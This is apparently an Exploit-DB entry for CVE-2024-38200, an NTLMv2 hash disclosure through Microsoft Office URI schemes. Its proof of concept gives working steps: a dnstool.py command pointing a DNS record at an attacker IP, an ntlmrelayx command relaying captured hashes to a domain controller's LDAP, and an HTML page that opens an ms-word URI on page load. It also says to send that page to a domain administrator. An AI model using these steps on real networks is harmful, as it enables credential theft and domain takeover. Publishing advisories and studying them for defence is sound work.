Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure

vendor:

Microsoft Office

by:

Metin Yunus Kandemir

6.1

CVSS

HIGH

Hash Disclosure

200

CWE

Product Name: Microsoft Office

Affected Version From: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)

Affected Version To: Not specified

Patch Exists: NO

Related CWE: CVE-2024-38200

CPE: a:microsoft:office:2019

Metasploit:

Other Scripts:

Platforms Tested: Windows 11

2024

Microsoft Office 2019 MSO Build 1808 – NTLMv2 Hash Disclosure

The exploit involves abusing MS Office URI schemes to fetch a document from a remote source. By invoking a specific URI scheme on a victim computer, an attacker can capture and relay NTLMv2 hash over SMB and HTTP.

Mitigation:

To mitigate this vulnerability, restrict the use of MS Office URI schemes and ensure that users do not execute or interact with unknown or suspicious URIs.

Source

Exploit-DB raw data:

# Exploit Title: Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.office.com/
# Software Link: https://www.office.com/
# Details: https://github.com/passtheticket/CVE-2024-38200
# Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)
# Tested against: Windows 11
# CVE: CVE-2024-38200


# Description
MS Office URI schemes allow for fetching a document from remote source. 
MS URI scheme format is '< scheme-name >:< command-name >"|"< command-argument-descriptor > "|"< command-argument >' .
Example: ms-word:ofe|u|http://hostname:port/leak.docx
When the URI "ms-word:ofe|u|http://hostname:port/leak.docx" is invoked from a victim computer. This behaviour is abused to capture and relay NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user's NTLMv2 hash over SMB, you can also visit https://www.privsec.nz/releases/ms-office-uri-handlers.


# Proof Of Concept
 If we add a DNS A record and use this record within the Office URI, Windows will consider the hostname as part of the Intranet Zone. In this way, NTLMv2 authentication occurs automatically and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a non-existent DNS record so this attack works with default settings for a domain user.

1. Add a DNS record to resolve hostname to attacker IP address which runs ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.
$ python dnstool.py -u 'unsafe.local\testuser' -p 'pass' -r 'attackerhost' --action 'add' --data [attacker-host-IP] [DC-IP] --zone unsafe.local


2. Fire up ntlmrelayx with following command
$ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080

3. Serve following HTML file using Apache server. Replace hostname with added record (e.g. attackerhost).

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Microsoft Office</title>
</head>
<body>
    <a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>

    <script>
        function navigateToLink() {
            var link = document.getElementById('link');
            if (link) {
                var url = link.getAttribute('href');
                window.location.href = url;
            }
        }
        window.onload = navigateToLink;
    </script>
</body>
</html> 


4. Send the URL of the above HTML file to a user with domain admin privileges. You should check whether the DNS record is resolved with the ping command before sending the URL. When the victim user navigates to the URL, clicking the 'Open' button is enough to capture the NTLMv2 hash. (no warning!)

5. The captured NTLMv2 hash over HTTP is relayed to Domain Controller with ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configurations with just two clicks.